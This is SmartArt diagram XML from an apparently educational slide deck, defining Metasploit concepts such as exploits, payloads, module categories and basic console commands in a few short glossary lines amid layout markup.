    <dgm:pt modelId="{7DF1C796-21A1-4922-98F3-DAD725B0C2DE}" type="pres">
      <dgm:prSet presAssocID="{EC66D02A-5A22-4B0B-B09C-33A83E6AEE40}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9EC38E05-115D-4F36-B992-DC0B1770D079}" type="pres">
      <dgm:prSet presAssocID="{8573465F-7E9C-4F8C-9584-4ACE89DB0FC9}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDB866F6-1F51-4F20-98C6-F7B4DB97EA2D}" type="pres">
      <dgm:prSet presAssocID="{A9DEE684-1ACF-4CF2-8234-880F69897954}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F9D16AD3-3F96-484D-8456-75030B963F25}" type="pres">
      <dgm:prSet presAssocID="{2A63675E-17D2-4758-AEC9-00E120F6F7D0}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9D060DD-8E2B-4A0C-8DC5-58AC26111184}" type="pres">
      <dgm:prSet presAssocID="{6D725EC2-40E0-45A5-9A9D-A2ECE71F7AAB}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{317F195C-42E4-4224-84B2-8297EAD70C48}" type="pres">
      <dgm:prSet presAssocID="{A28B39E1-1EAF-4A55-87E1-36F7F34C5E3C}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{30706354-438C-46A6-B64D-19293FA3DB25}" type="pres">
      <dgm:prSet presAssocID="{DE670228-4136-4FF9-839E-9569591B4F46}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AC29063F-D122-484F-B6DE-B6AD6588869E}" type="pres">
      <dgm:prSet presAssocID="{2717862E-B7E0-41F2-AAEA-DD4258DC2F99}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EBB49653-41C2-45C8-B287-7C49446E7483}" type="pres">
      <dgm:prSet presAssocID="{AB970D74-91F1-4F49-8537-458188927989}" presName="parentText" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB8EABC3-344D-4E55-85A3-4EFAA3567E29}" type="pres">
      <dgm:prSet presAssocID="{C70209A0-77B9-4F6A-87D9-BD7471CB2D80}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{52E4B533-5A59-45EB-9D81-8825B2BCBC01}" type="pres">
      <dgm:prSet presAssocID="{B82D20A2-7666-40A1-87CC-75E7381F04CE}" presName="parentText" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F389DC4E-5057-4B5A-9E09-84024237E162}" type="pres">
      <dgm:prSet presAssocID="{9F25BB13-2303-4998-810E-442DC8B22580}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{05EC6760-5BAA-4A0C-BF8B-26665C1A5594}" type="pres">
      <dgm:prSet presAssocID="{CDC4C92D-9D3C-43D6-A328-8ED1A922499C}" presName="parentText" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{E30A1202-1AB6-48DE-AAB3-0F15BA412A70}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{AB970D74-91F1-4F49-8537-458188927989}" srcOrd="5" destOrd="0" parTransId="{04331F20-7E80-4AE0-A504-931B7759E57C}" sibTransId="{C70209A0-77B9-4F6A-87D9-BD7471CB2D80}"/>
    <dgm:cxn modelId="{58E3C71C-82FB-42F5-94C4-2A4577169945}" type="presOf" srcId="{7C79C5E2-22DB-492F-918E-4381259D74DC}" destId="{C4574B46-B3AB-420C-9ACE-8FB24A04CA82}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1385431E-0242-4B28-BB80-2DC4DF9CE3FD}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{CDC4C92D-9D3C-43D6-A328-8ED1A922499C}" srcOrd="7" destOrd="0" parTransId="{043AEA94-C1A9-4EC5-A44F-BA46C59DB550}" sibTransId="{9250E001-5C44-4DB7-8501-1FE7B7D6EB29}"/>
    <dgm:cxn modelId="{AA88DE23-7BAE-4766-8687-C84E7EA2E4DC}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{EC66D02A-5A22-4B0B-B09C-33A83E6AEE40}" srcOrd="1" destOrd="0" parTransId="{5C3CA703-C1E0-4164-A4CC-93F22DED029D}" sibTransId="{8573465F-7E9C-4F8C-9584-4ACE89DB0FC9}"/>
    <dgm:cxn modelId="{36229224-87C8-4FDE-BC8D-C0E5EE88FC24}" type="presOf" srcId="{CDC4C92D-9D3C-43D6-A328-8ED1A922499C}" destId="{05EC6760-5BAA-4A0C-BF8B-26665C1A5594}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D55BB032-6511-448B-9BAF-801F8858D1AC}" type="presOf" srcId="{EC66D02A-5A22-4B0B-B09C-33A83E6AEE40}" destId="{7DF1C796-21A1-4922-98F3-DAD725B0C2DE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{AEEA7035-C499-4B31-AB1F-D0755F3D3D91}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{6D725EC2-40E0-45A5-9A9D-A2ECE71F7AAB}" srcOrd="3" destOrd="0" parTransId="{EF6EE85E-7A7E-430C-B511-6678D623B7B9}" sibTransId="{A28B39E1-1EAF-4A55-87E1-36F7F34C5E3C}"/>
    <dgm:cxn modelId="{079BA937-0DEB-4754-951A-4C8117288018}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{DE670228-4136-4FF9-839E-9569591B4F46}" srcOrd="4" destOrd="0" parTransId="{A3A7140A-BAAC-4E7D-851F-3256036E5504}" sibTransId="{2717862E-B7E0-41F2-AAEA-DD4258DC2F99}"/>
    <dgm:cxn modelId="{5E98F564-3103-4459-9796-4F5C08AE4C8E}" type="presOf" srcId="{A9DEE684-1ACF-4CF2-8234-880F69897954}" destId="{EDB866F6-1F51-4F20-98C6-F7B4DB97EA2D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8E18F449-2DDB-4EFE-8550-00C5EDB4A890}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{7C79C5E2-22DB-492F-918E-4381259D74DC}" srcOrd="0" destOrd="0" parTransId="{A317EA6A-2698-4ED5-8EF5-CE0C32065B56}" sibTransId="{C1CCB6E6-223C-4724-AF49-D844CB24A1AB}"/>
    <dgm:cxn modelId="{3D38206E-E04C-46A8-97BB-33C661098E65}" type="presOf" srcId="{B82D20A2-7666-40A1-87CC-75E7381F04CE}" destId="{52E4B533-5A59-45EB-9D81-8825B2BCBC01}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{305EB658-145B-4A96-954E-FAC793283F5F}" type="presOf" srcId="{6D725EC2-40E0-45A5-9A9D-A2ECE71F7AAB}" destId="{B9D060DD-8E2B-4A0C-8DC5-58AC26111184}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{002B65AC-7039-4BF6-B129-DED1E3C41DC0}" type="presOf" srcId="{AB970D74-91F1-4F49-8537-458188927989}" destId="{EBB49653-41C2-45C8-B287-7C49446E7483}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DD3114B1-60FF-41B9-B8EC-A09B988A0845}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{B82D20A2-7666-40A1-87CC-75E7381F04CE}" srcOrd="6" destOrd="0" parTransId="{5AE90DCC-C7BD-4ACD-9287-91B095D7B3A3}" sibTransId="{9F25BB13-2303-4998-810E-442DC8B22580}"/>
    <dgm:cxn modelId="{A1A37AB9-1372-4963-8880-EFF785D4F323}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{A9DEE684-1ACF-4CF2-8234-880F69897954}" srcOrd="2" destOrd="0" parTransId="{3FEE2CF3-84E2-4B44-AF66-0008913B273A}" sibTransId="{2A63675E-17D2-4758-AEC9-00E120F6F7D0}"/>
    <dgm:cxn modelId="{15ACBBBE-DFD4-4299-977A-543E3373C387}" type="presOf" srcId="{DE670228-4136-4FF9-839E-9569591B4F46}" destId="{30706354-438C-46A6-B64D-19293FA3DB25}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C27175C7-3E72-4E41-AFBD-82C11FE63151}" type="presOf" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{98C38AE3-EA75-4CBF-809A-B7B82687F5B8}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{C4574B46-B3AB-420C-9ACE-8FB24A04CA82}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{48DFCBAC-9314-47F6-B1DE-9030F761BB8D}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{A8BA7C88-E234-4D1C-BE18-25C9F8C5B15A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7A1AD195-D7DA-42C7-A708-2EC19C6A2502}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{7DF1C796-21A1-4922-98F3-DAD725B0C2DE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DF6E2255-3E69-4D46-B073-234259A0519E}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{9EC38E05-115D-4F36-B992-DC0B1770D079}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{54F6091C-131C-470A-AC86-A301FC32F924}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{EDB866F6-1F51-4F20-98C6-F7B4DB97EA2D}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E3E3783A-6D56-430A-9DA1-CF8AC42E0CF5}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{F9D16AD3-3F96-484D-8456-75030B963F25}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3FA0D2BB-95F2-4C50-AD69-1A78DB7FFAB4}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{B9D060DD-8E2B-4A0C-8DC5-58AC26111184}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FFBC2779-2D71-4CAC-A45B-7A83ED3ED205}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{317F195C-42E4-4224-84B2-8297EAD70C48}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6002E133-E97D-4D3E-92FE-9EBA8DE6A908}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{30706354-438C-46A6-B64D-19293FA3DB25}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DA511E7A-0D3E-407B-844C-2AA8FAFEB5DD}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{AC29063F-D122-484F-B6DE-B6AD6588869E}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6C5563C0-2635-4175-8451-27567341A957}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{EBB49653-41C2-45C8-B287-7C49446E7483}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{62C28F99-CD8B-4C3C-AD6D-9172F0868C1F}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{DB8EABC3-344D-4E55-85A3-4EFAA3567E29}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{90550111-2E8C-4EAF-9E53-A59E534B1157}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{52E4B533-5A59-45EB-9D81-8825B2BCBC01}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F2936B07-C41F-4191-9DF3-4128457CF352}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{F389DC4E-5057-4B5A-9E09-84024237E162}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8A4316DE-2BF0-4CB8-837D-6D5FC1EC24AF}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{05EC6760-5BAA-4A0C-BF8B-26665C1A5594}"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6686287-C283-4BF0-83F3-1200E04A733D}"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3FAC53B-E4FB-4DCA-A92B-AB739F0F082E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0" dirty="0"/>
            <a:t>exploits:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0"/>
            <a:t> Code that takes advantage of system vulnerabilities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E0F402D-CEF5-4AEC-92E0-E4468E94BB6F}" type="parTrans" cxnId="{E9F3D72E-7B46-485B-9830-5D74B38AF6CE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E6A4C218-910E-4AA6-846F-F3EF8D036910}" type="sibTrans" cxnId="{E9F3D72E-7B46-485B-9830-5D74B38AF6CE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5558BCEC-06BD-482C-9223-A5A7E8715D0D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Payloads:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Code executed on the target system (e.g., getting a shell).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE39B831-8160-45B6-9F6B-8B8B2D17A2AF}" type="parTrans" cxnId="{AC44DB4B-4338-49BB-A25B-964743E6BD8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4E553751-5429-45D5-9B9A-6A005E0EB3EE}" type="sibTrans" cxnId="{AC44DB4B-4338-49BB-A25B-964743E6BD8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{329FD0B2-58A8-47F1-B14C-2FA2ACE28716}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Module Categories:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{714E40BE-4691-45A6-ADD0-5A730478B412}" type="parTrans" cxnId="{C92FE4E2-69E7-44FE-9742-836CC3DD1908}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02F620E1-BAA7-4DE3-83C0-AA0E5747B20C}" type="sibTrans" cxnId="{C92FE4E2-69E7-44FE-9742-836CC3DD1908}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{381DF832-8D96-4523-B0A9-86E5231B5204}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Auxiliary:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Scanners, fuzzers.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3135121C-765B-4731-89CD-2054EC1D506E}" type="parTrans" cxnId="{D8C07362-FCD1-4049-8199-E6FB2A64029B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99C1A353-FBD3-4FC4-AA8B-61DEF30D9DAA}" type="sibTrans" cxnId="{D8C07362-FCD1-4049-8199-E6FB2A64029B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9A33BD5-937A-460A-A6B7-0569FA3BFE2A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Encoders &amp; Evasion:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> For obfuscation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6FCA302E-1CB6-4972-904D-640EDBBFEA02}" type="parTrans" cxnId="{7EC0968F-BB58-47FA-9798-0039BB0F2F52}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD837FD5-FB21-4E46-A04C-E7666ECA1A4A}" type="sibTrans" cxnId="{7EC0968F-BB58-47FA-9798-0039BB0F2F52}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2ECA8F91-3892-4B56-9B74-CBE5F05191A4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>NOPs:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Used as buffers in payloads.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3938C548-010B-4C29-8F81-08723059A253}" type="parTrans" cxnId="{F24C6BAA-E230-48BE-BE06-ACDECED70821}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33C24520-CC0E-4D38-A18B-A1068AA95493}" type="sibTrans" cxnId="{F24C6BAA-E230-48BE-BE06-ACDECED70821}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFFDEAFF-4D0B-44C0-AF25-53A51FF300A7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Payloads:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Self-contained, staged, or split into stagers and stages.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4BE0219-C288-4736-828F-730E70147926}" type="parTrans" cxnId="{3C4F8253-0966-4D2C-AF86-47FA9B01B969}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F33125F4-B3A7-45A4-AF97-F76B8AA4F367}" type="sibTrans" cxnId="{3C4F8253-0966-4D2C-AF86-47FA9B01B969}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65F63F45-70D5-4A65-8A13-F95973B3A640}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Metasploit Commands:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FCB238D3-EC65-47C7-8C5C-2673869FECE9}" type="parTrans" cxnId="{A43FD873-3085-4281-84FC-43789281B6E7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{805F1243-4C19-409D-8925-D880BFD6B0B1}" type="sibTrans" cxnId="{A43FD873-3085-4281-84FC-43789281B6E7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{49D04F8C-9DB1-48C8-BC9F-8DCF136A7B8C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>use to select modules, search for exploits, exploit to run, set to configure parameters.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2621FC81-6EE5-433C-BF27-D5577F046C6A}" type="parTrans" cxnId="{43C7D459-B544-410E-8585-C4FA8D8609D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9739069-9C5A-447F-854B-2D28BB687823}" type="sibTrans" cxnId="{43C7D459-B544-410E-8585-C4FA8D8609D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" type="pres">
      <dgm:prSet presAssocID="{26686287-C283-4BF0-83F3-1200E04A733D}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FB3445E7-0C1B-42EE-9E74-F0D08A64DF81}" type="pres">
      <dgm:prSet presAssocID="{E3FAC53B-E4FB-4DCA-A92B-AB739F0F082E}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{78EBF2F6-3000-4543-824F-EE491F3E9B02}" type="pres">
      <dgm:prSet presAssocID="{E6A4C218-910E-4AA6-846F-F3EF8D036910}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{562DBC2E-BA9C-413A-96B2-DA091289F5C4}" type="pres">
      <dgm:prSet presAssocID="{5558BCEC-06BD-482C-9223-A5A7E8715D0D}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8FAC889B-DC2B-476F-BF6B-8AFE6AC2CD39}" type="pres">
      <dgm:prSet presAssocID="{4E553751-5429-45D5-9B9A-6A005E0EB3EE}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8A66F3D3-0304-4741-A8A6-36A2C97DB8D9}" type="pres">
      <dgm:prSet presAssocID="{329FD0B2-58A8-47F1-B14C-2FA2ACE28716}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
